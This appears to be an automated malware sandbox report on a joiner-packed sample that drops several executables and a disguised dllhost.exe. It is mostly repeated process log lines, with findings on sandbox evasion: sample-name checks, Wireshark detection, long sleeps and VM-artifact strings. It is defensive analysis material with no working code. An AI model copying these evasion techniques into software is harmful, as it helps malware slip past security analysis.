Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

.NET source code contains a sample name check

Source: virus.exe.bin.exe, Module1.cs	.Net Code: Main contains sample name check
Source: Hyra.exe.0.dr, Module1.cs	.Net Code: Main contains sample name check
Source: final.exe.2.dr, Module1.cs	.Net Code: Main contains sample name check

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary or memory string: WIRESHARK.EXE

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 1780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 3550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Memory allocated: 1B550000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Memory allocated: 1AAA0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 15D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 3330000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Memory allocated: 1B330000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: 2A60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Memory allocated: 4A60000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: 2820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Memory allocated: 4820000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 870000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: AD0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 6200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 7200000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 7360000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 8360000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: AC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 4A10000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 5CF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 6CF0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 1050000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: 2960000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Memory allocated: C60000 memory commit \| memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598916
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598409
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598260
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598063
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 597625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 560	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 490	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1449	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2040
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 1396
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 742
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Window / User API: threadDelayed 834

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\virus.exe.bin.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe TID: 6320	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556	Thread sleep count: 560 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4072	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516	Thread sleep count: 490 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4196	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3272	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe TID: 5576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 596	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 6408	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe TID: 5028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598409s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598260s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -598063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe TID: 6428	Thread sleep time: -597625s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4488	Thread sleep count: 2040 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5208	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332	Thread sleep time: -698000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2332	Thread sleep time: -417000s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4108	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 4948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\dllhost.exe TID: 3744	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598916
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598625
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598409
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598260
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 598063
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Thread delayed: delay time: 597625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\pSo*T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: final.exe, 0000000B.00000002.1598765313.000000000337B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxService%\\.\PhysicalDrive0
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Ljava/lang/VirtualMachineError;
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: final.exe, 0000000B.00000002.1518447401.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
